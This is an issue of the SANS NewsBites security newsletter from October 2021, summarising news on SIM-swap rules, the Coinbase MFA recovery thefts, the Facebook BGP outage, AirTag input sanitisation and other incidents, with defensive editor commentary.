SANS NewsBites

FCC Wants to Make SIM Swapping Attacks Less Likely to Succeed; Vulnerable MFA Recovery Process Used to Steal Cryptocurrency from Coinbase; Faulty Facebook BGP Update Likely Cause of Outage

October 5, 2021  |  Volume XXIII - Issue #78

Top of the News


2021-10-01

FCC Proposed Rulemaking to Fight SIM Swapping

The US Federal Communications Commission (FCC) is seeking feedback on its proposed rulemaking regarding SIM swapping and number port out fraud. Both these attacks can be used to take control of mobile phone numbers and with that access associated accounts. The draft rulemaking “proposes to amend the Customer Proprietary Network Information (CPNI) and Local Number Portability rules to require carriers to adopt secure methods of authenticating a customer before redirecting a customer’s phone number to a new device or carrier. It also proposes requiring providers to immediately notify customers whenever a SIM change or port request is made on customers’ accounts.”

Editor's Note

Good to see the FCC finally taking action on this longstanding problem. Last year, Princeton researchers showed how shoddy SIM swapping authorization and authentication processes were still in use by most carriers. Next maybe the FCC will address the ease of cell number spoofing.

John Pescatore
John Pescatore

Make sure that you’ve checked the security settings on your mobile account relating to SIM swapping. Some of the carriers have updated their controls, such as requiring an added PIN be created to authorize a legitimate swap. Even so, the wording can be tricky and should be read carefully. When setting up 2FA, select options other than SMS or a call to your mobile, and when those are the only choices the only option, they are still better than a reusable password.

Lee Neely
Lee Neely

This is a hard problem. Carriers want to resist the small number of fraudulent swaps while not inefficiently burdening the large number of legitimate (lost, stolen, broken or new phones) swaps. At a minimum carriers should confirm all swaps out-of-band. Not expensive, not even necessarily inconvenient.

William Hugh Murray
William Hugh Murray

2021-10-01

Coinbase MFA Vulnerability Exploited to Steal Cryptocurrency

Thieves were able to steal cryptocurrency from at least 6,000 Coinbase customers by exploiting a weakness in the Coinbase SMS multi-factor authentication (MFA) feature. Coinbase notified affected users last week. The breaches occurred between March and May 2021. To steal the cryptocurrency, an attacker would have needed a targeted Coinbase customer’s email address, password, and phone number, as well as access to the email account. Coinbase has since updated its SMS Account Recovery protocol to prevent bypassing the authentication process.

Editor's Note

Every authentication method, from passwords to 2FA to biometrics, requires a backup authentication approach in case the primary authentication method doesn’t work. Those processes need to be tested for weaknesses, as too often they prioritize ease of use/cost reduction over security. (See the FCC/SIM swapping item above.)

John Pescatore
John Pescatore

Coinbase does not reveal a lot of details other than saying that the flaw is related to the 2FA recovery process. So far, I have not seen a system that recovers lost 2FA securely and efficiently. Too often, recovery means answering some security questions or calling a help desk, which will again ask some recovery questions. Worse: recovery systems that are buggy and let users disable 2FA by brute forcing a simple six digit code.

Johannes Ullrich
Johannes Ullrich

Attackers were able to recover a user’s account, log in and transfer their funds to a non-Coinbase wallet. Coinbase has multiple MFA options, to include secure keys, TOTP and SMS as a last resort. Victims who had secured their account and lost funds are being reimbursed. If you have a Coinbase or other cryptocurrency wallet, revisit MFA options to move away from SMS if possible.

Lee Neely
Lee Neely

2021-10-04

Bungled BGP Route Update Likely Cause of Facebook Outage on Monday

Monday’s outage affecting Facebook, Instagram, WhatsApp and other Facebook-owned properties was likely due to a bungled Border Gateway Protocol (BGP) route update. The problems began around 11:30 am EDT; Facebook services began coming back online roughly five hours later. The outage prevented some Facebook employees from entering buildings because the badge access system was not working.

Editor's Note

Outages and routing issues due to BGP mistakes are common enough that there is a website tracking them (e.g. see https://observatory.manrs.org/#/history ). For your next business continuity tabletop: Consider what will happen if your authentication servers are down due to a routing issue. Include the authentication servers used to authenticate local and remote users to make routing updates.

Johannes Ullrich
Johannes Ullrich

The first thing that comes to mind is that the world’s economic output probably went up for the five hours that Facebook was off the air… Some of the longest outages are due to self-inflicted wounds – some of you may even remember the 9 hour+ January 1990 ATT telecoms outage when ATT pushed out a bad software update to their switches. Just as with DDoS and ransomware incidents, how to deal with extended outages of revenue-critical services is an important tabletop exercise.

John Pescatore
John Pescatore

Reversing the BGP update required physical access to routers which were in buildings where the physical access systems were also offline. Make sure that there is a viable contingency plan for your physical access control system. Document the use cases which require physical access to IT components, making sure you’ve not overlooked options to further minimize that access. Test your contingency physical access controls regularly. Make sure that you don’t have single points of failure. Remember the productivity losses we attributed to the Microsoft Solitaire game on Windows? Social media seems to have stepped into that role and is available from about every platform a user has, not just their Windows systems. It may be time to revisit your incidental use policy with this outage in mind.

Lee Neely
Lee Neely

The Rest of the Week's News


2021-10-04

Apple AirTags Do Not Sanitize User Input

Apple AirTags do not sanitize the phone number input field; as a result, the devices could be used in drop attacks, in which AirTags laced with malicious code are strategically dropped in the hope that someone will pick it up and scan it. When AirTags are set to Lost Mode, anyone who finds it and scans it will see a message, presumably with the owner’s contact information. Because the AirTag phone number user input field is not sanitized, a malicious actor could enter malicious code in its place.

Editor's Note

It is not really the AirTags that should be sanitizing user input. Instead, Apple's website displaying the link should properly encode the data to prevent XSS, and the API they use to receive the data the user configures for the link should properly validate input. The AirTag, a device the user controls, should not be used to implement security.

Johannes Ullrich
Johannes Ullrich

Apple AirTags are about $30, which raises the bar on a malicious actor leaving them around to be scanned by an unwitting victim, as compared to USB flash drives which can be under $1; even so you may want to advise staff to be cautious, particularly VIPs. Two lessons here, first: input sanitization is always important, for every input. Second: respond to vulnerability disclosures. The researcher disclosed the weakness to Apple on June 20th with no response for several months despite follow-up communication. While Apple did finally respond and will be addressing this error in an upcoming update, the researcher disclosed the weakness as it had not been addressed for 90 days.

Lee Neely
Lee Neely

Apple had previously only partially addressed stalking risk of AirTags, where the malicious actor drops an AirTag in someone’s bag or vehicle and has cheap and easy tracking. The good news is “drop attacks” are both expensive since AirTags cost much more than USB drives, and require physical access to the target. Good to warn executives they might receive malicious AirTags in the mail, just as “poisoned” USB drives were physically mailed out over the past couple of years.

John Pescatore
John Pescatore

2021-10-01

Digitization Drives Changes in Risk Management

During a virtual panel hosted by Dragos, CISOs and other experts discussed the effect of digitization on risk management in manufacturing environments and other operational technology (OT) dependent environments. Companies are starting to make the change to centralized IT and cybersecurity operations rather than site-specific cybersecurity that varies from one plant to the next.

Editor's Note

As more components are reporting and accessing OT components, isolation is becoming more challenging. Make sure that you know what systems need to interact with your OT and restrict access to only those authorized systems and users. Monitor the networks they are using for unexpected behavior, protocols, or unauthorized devices. Don’t provide direct OT connectivity to the Internet.

Lee Neely
Lee Neely

Standardization of security is essential to efficiency, ensuring that sensitive resources get the necessary and intended protection while expensive measures are reserved to only those resources that require them.

William Hugh Murray
William Hugh Murray

2021-10-01

RFID Military Weapons Tracking Poses Security Risk

An Associated Press (AP) report found that some US military units are using radio frequency identification (RFID) tags for firearms. The AP was looking into the military’s use of technology in keeping control of their firearm inventory as part of a larger investigation into stolen and missing military guns. The RFID tags are used to help with inventory. A Department of Defense (DoD) spokesperson said that department policy opposes the use of RFID tags in firearms except in very limited instances – in guns for firing ranges, and not in those used to protect military bases or in combat. The investigation found that it is relatively easy for adversaries to identify US troops through the RFID tags at a greater distance than the contractors that install the RFID systems claim. In addition, the tags are easy to clone.

Editor's Note

Don’t underestimate the range at which a transmitter like RFID tags can be read. Also, be aware of the ease of duplication. Lastly, consider the OPSEC tradeoff of easy remote/touchless read versus the adversary having that information.

Lee Neely
Lee Neely

RFID is one of those tricky technologies that often falls in the creases of security programs. Like electronic locks, “smart” home devices, industrial wireless signals, and hardware tokens, these intersectional systems are often poorly understood - even by their vendors. Recommendation: give special attention to “The Weird” in your environment. The attack surface is all around us!

Christopher Elgee
Christopher Elgee

2021-10-04

Apache Workflow Misconfigurations Expose Sensitive Data

Researchers from Intezer have found that misconfigured instances of older versions of Apache Workflow are exposing sensitive information, including account credentials for Amazon Web Services, Google Cloud Platform, PayPal, and other platforms and services. The exposed customer information could be violations of data protection laws. Intezer has notified the organizations it identified as running misconfigured Apache Workflow instances.

Editor's Note

The blog post is a great read for anybody dealing with credentials (meaning everybody...). The mistakes shown go beyond Apache Workflow. Many of the issues outlined can be found in a wide range of code dealing with storing and using credentials securely.

Johannes Ullrich
Johannes Ullrich

The workflows leverage stored credentials for accessing services. Review your workflows to make sure that you are not embedding credentials in scripts or variables, but rather use the connections functions to manage those credentials where they are encrypted. Even so, verify the plain-text password value wasn’t also stored in the extras field.

Lee Neely
Lee Neely

2021-09-30

Phishing Scheme Used Telegram Bots

A phishing campaign that targeted at least eight Canadian banks used Telegram-based bots to gather account access information. The bots are being used to steal one-time passwords used in two-factor authentication.

Editor's Note

While 2FA, using SMS or a phone call are a huge step in the right direction, these verification methods are subject to interception. When configuring services to support MFA, enable TOTP, physical tokens, smart cards or other mechanisms not subject to interception before allowing SMS/Phone options.

Lee Neely
Lee Neely

2021-10-04

Johnson Memorial Health in Indiana Suffers Cyberattack

Johnson Memorial Health in Indiana is operating under electronic health record (EHR) downtime following a cyberattack on October 2. Johnson officials say that no appointments or surgeries have been cancelled. Another Indiana healthcare provider, Schneck Medical Center, was hit with a cyberattack in late September. A third Indiana healthcare provider, Eskenazi Health, experienced a cyberattack in August, which resulted in the theft of patient and employee data.

Editor's Note

They are operating under EHR downtime procedures, which were previously established and tested. Consider the viability of operating with key systems offline. Make contingency plans accordingly. If operation without those systems is not viable, and a suitable option cannot be determined, engage senior management before you consider that not operating is an acceptable alternative.

Lee Neely
Lee Neely

Criminals are disproportionately targeting healthcare. Patients are put at risk of injury and death and clinical data is being lost that will never be recovered.

William Hugh Murray
William Hugh Murray

Internet Storm Center Tech Corner

Facebook Outage

https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/


Boutique "Dark" Botnet Hunting for Crumbs

https://isc.sans.edu/forums/diary/Boutique+Dark+Botnet+Hunting+for+Crumbs/27898/


A New Tool To Add to Your LOLBAS List: cvtres.exe

https://isc.sans.edu/forums/diary/New+Tool+to+Add+to+Your+LOLBAS+List+cvtresexe/27892/


Cyber Security Awareness Month

https://www.sans.org/security-awareness-training/resources/

https://isc.sans.edu/tag.html?tag=csam


Apache Airflow May Leak Credentials

https://www.intezer.com/blog/cloud-security/misconfigured-airflows-leak-credentials/


FCC Attempts to Fight SIM Swapping

https://docs.fcc.gov/public/attachments/DOC-376199A1.pdf


Google Chrome Continuing Updates

https://support.google.com/chrome/answer/95414?hl=en&co=GENIE.Platform%3DDesktop


MacOS Gatekeeper Bypass

https://labs.f-secure.com/blog/the-discovery-of-cve-2021-1810/